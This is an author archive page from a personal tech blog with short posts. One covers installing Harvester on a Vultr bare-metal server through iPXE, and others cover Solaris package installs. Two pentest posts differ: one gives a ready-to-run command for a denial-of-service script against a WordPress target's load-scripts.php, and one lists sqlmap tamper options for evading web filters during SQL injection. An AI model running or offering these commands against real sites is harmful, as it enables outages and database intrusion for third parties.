Mohamad Zulfahmy, Author at Mohamad Zulfahmy

Install Harvester on Vultr Bare Metal Server using iPXE

by Mohamad Zulfahmy | 17/07/2024 | Linux

Hi, while I’m trying to find a cheap hourly dedicated server I stumbled upon an option given by Vultr.com with their bare-metal server.

Thanks to Arif Che Hussin for introducing me with this cool opensource HCI deployment.

In this tutorial, I’m using an E-2286G bare metal server with VPC 2.0 enabled

Requirements:

A single Cloud Server for hosting ISO files, vmzlinuz, initrd, and config-create.yaml files. I’m just using apache2 to run :80 ports. (hostname: http-vm)
A bare-metal servers of E-2286G (hostname: harvester01). Please enable VPC 2.0 for private IP

First up, login to http-vm and install apache2 then start the apache2 service. Please disable all firewalls or allow :80 port
Then, download all these files based on the latest Harvester version
https://github.com/harvester/harvester/releases/

I downloaded these file to my /var/www/html
💿 https://releases.rancher.com/harvester/v1.3.1/harvester-v1.3.1-amd64.iso📁 https://releases.rancher.com/harvester/v1.3.1/harvester-v1.3.1-vmlinuz-amd64📁 https://releases.rancher.com/harvester/v1.3.1/harvester-v1.3.1-initrd-amd64
📁 https://releases.rancher.com/harvester/v1.3.1/harvester-v1.3.1-rootfs-amd64.squashfs

Next, I create a config-create.yaml files to define my installation configuration of Harvester

scheme_version: 1
token: your-token  # Replace with a desired token
os:
  hostname: node1  # Set a hostname.
  ssh_authorized_keys:
  - ssh-rsa # Add ssh key here
  password: yourp@ssword  # Replace with your password
  dns_nameservers:
    - 8.8.8.8
    - 1.1.1.1
  ntp_servers:
  - 0.suse.pool.ntp.org
  - 1.suse.pool.ntp.org
install:
  mode: create
  management_interface:
    interfaces: 
      - name: enp1s0f0 # Vultr baremetal interface name
        hwAddr: 3c:ec:ef:b9:c2:87  # Replace with your management interface MAC address
    ip: 10.40.112.3  # Replace with your desired static VPC 2.0 IP address
    subnet_mask: 255.255.240.0  # Replace with your desired netmask
    gateway: 10.40.112.1 # Change the 
    mtu: 1450  # Set MTU for the management interface
    method: static
  device: /dev/sda  # The target disk to install
  data_disk: /dev/sdb  # It is recommended to use a separate disk to store VM data
  iso_url: http://(http=-vm)/harvester-v1.3.1-amd64.iso
  vip: 139.180.138.21  # The Public IP provided by Vultr to access the Harvester GUI.
  vip_mode: static
  vip_hw_addr: 3c:ec:ef:b9:c2:86  # Specify the MAC address for the VIP interface
  vip_netmask: 255.255.254.0  # Netmask for VIP
  vip_gateway: 139.180.138.1  # Gateway for the VIP
  
  #Subnotes you can get all config of our server IP/MAC details in Vultr Settings

Then, navigate to Vultr Dashboard -> Products -> Orchestration -> Scripts -> Add Startup Scripts

Name: Harvester-Create
Type: PXE
Content:

#!ipxe
kernel http://(http-vm)/harvester-v1.3.1-vmlinuz-amd64 ip=dhcp net.ifnames=1 rd.cos.disable rd.noverifyssl console=tty1 root=live:http://(http-vm)/harvester-v1.3.1-rootfs-amd64.squashfs harvester.install.automatic=true harvester.install.config_url=http://(http-vm)/create-config.yaml harvester.install.skipchecks=true
initrd http://(http-vm)/harvester-v1.3.1-initrd-amd64
boot

#change (http-vm) to public IP Address

Boot up the server normally with the PXE config selected when you deploy the server

The installation process will be something like this

A successfully booted up servers

The server is now easily booted up and ready to use for Virtualization or K8S deployment.

Next, I will demonstrate how to join multiple nodes in Harvester and controlled by Rancher deployment.

Arigato and happy k8s!

Bring Down Any WordPress with Doser.py

by Mohamad Zulfahmy | 16/08/2019 | Pentest

Tool needed

Python 2/3
Python requests

Download the Dos script

wget https://raw.githubusercontent.com/Quitten/doser.py/master/doser.py

Run the script

python doser.py -g 'https://target.com/wp-admin/load-scripts.php?c=1&load%5B%5D=eutil,common,wp-a11y,sack,quicktag,colorpicker,editor,wp-fullscreen-stu,wp-ajax-response,wp-api-request,wp-pointer,autosave,heartbeat,wp-auth-check,wp-lists,prototype,scriptaculous-root,scriptaculous-builder,scriptaculous-dragdrop,scriptaculous-effects,scriptaculous-slider,scriptaculous-sound,scriptaculous-controls,scriptaculous,cropper,jquery,jquery-core,jquery-migrate,jquery-ui-core,jquery-effects-core,jquery-effects-blind,jquery-effects-bounce,jquery-effects-clip,jquery-effects-drop,jquery-effects-explode,jquery-effects-fade,jquery-effects-fold,jquery-effects-highlight,jquery-effects-puff,jquery-effects-pulsate,jquery-effects-scale,jquery-effects-shake,jquery-effects-size,jquery-effects-slide,jquery-effects-transfer,jquery-ui-accordion,jquery-ui-autocomplete,jquery-ui-button,jquery-ui-datepicker,jquery-ui-dialog,jquery-ui-draggable,jquery-ui-droppable,jquery-ui-menu,jquery-ui-mouse,jquery-ui-position,jquery-ui-progressbar,jquery-ui-resizable,jquery-ui-selectable,jquery-ui-selectmenu,jquery-ui-slider,jquery-ui-sortable,jquery-ui-spinner,jquery-ui-tabs,jquery-ui-tooltip,jquery-ui-widget,jquery-form,jquery-color,schedule,jquery-query,jquery-serialize-object,jquery-hotkeys,jquery-table-hotkeys,jquery-touch-punch,suggest,imagesloaded,masonry,jquery-masonry,thickbox,jcrop,swfobject,moxiejs,plupload,plupload-handlers,wp-plupload,swfupload,swfupload-all,swfupload-handlers,comment-repl,json2,underscore,backbone,wp-util,wp-sanitize,wp-backbone,revisions,imgareaselect,mediaelement,mediaelement-core,mediaelement-migrat,mediaelement-vimeo,wp-mediaelement,wp-codemirror,csslint,jshint,esprima,jsonlint,htmlhint,htmlhint-kses,code-editor,wp-theme-plugin-editor,wp-playlist,zxcvbn-async,password-strength-meter,user-profile,language-chooser,user-suggest,admin-ba,wplink,wpdialogs,word-coun,media-upload,hoverIntent,customize-base,customize-loader,customize-preview,customize-models,customize-views,customize-controls,customize-selective-refresh,customize-widgets,customize-preview-widgets,customize-nav-menus,customize-preview-nav-menus,wp-custom-header,accordion,shortcode,media-models,wp-embe,media-views,media-editor,media-audiovideo,mce-view,wp-api,admin-tags,admin-comments,xfn,postbox,tags-box,tags-suggest,post,editor-expand,link,comment,admin-gallery,admin-widgets,media-widgets,media-audio-widget,media-image-widget,media-gallery-widget,media-video-widget,text-widgets,custom-html-widgets,theme,inline-edit-post,inline-edit-tax,plugin-install,updates,farbtastic,iris,wp-color-picker,dashboard,list-revision,media-grid,media,image-edit,set-post-thumbnail,nav-menu,custom-header,custom-background,media-gallery,svg-painter&ver=4.9' -t 9999

SQLmap Tamper Script

by Mohamad Zulfahmy | 18/02/2019 | Pentest

Just add on sqlmap options.

--tamper=between,bluecoat,charencode,charunicodeencode,concat2concatws,equaltolike,greatest,halfversionedmorekeywords,ifnull2ifisnull,modsecurityversioned,modsecurityzeroversioned,multiplespaces,randomcase,space2comment,space2hash,space2morehash,space2mysqldash,space2plus,space2randomblank,unionalltounion,unmagicquotes,versionedkeywords,versionedmorekeywords,xforwardedfor

Install GCC Solaris

by Mohamad Zulfahmy | 23/07/2018 | Linux

Run this command from your terminal to install GCC.

For GCC 3.4.x

pkg install gcc-3

For GCC 4.5.x

pkg install gcc-45

For GCC 4.7.x

pkg install gcc-47

For GCC 4.8.x

pkg install gcc-48

Install OpenCSW Solaris 10/11

by Mohamad Zulfahmy | 23/07/2018 | Linux

Configure the OpenCSW repo to fetch packages

pkgadd -d http://get.opencsw.org/now

Sample package that can be installed

/opt/csw/bin/pkgutil -y -i CSWpmstringapprox pm_lwp_mediatypes pm_lwp_protocol_https gmake pm_xml_simple pm_net_ip pm_netaddr_ip pm_netaddrip pm_crypt_ssleay pm_net_ssleay pm_netssleay_stub nmap pm_proc_daemon pm_proc_pid_file ;

Temporary set bin path.

export PATH=/opt/csw/bin:$PATH

« Older Entries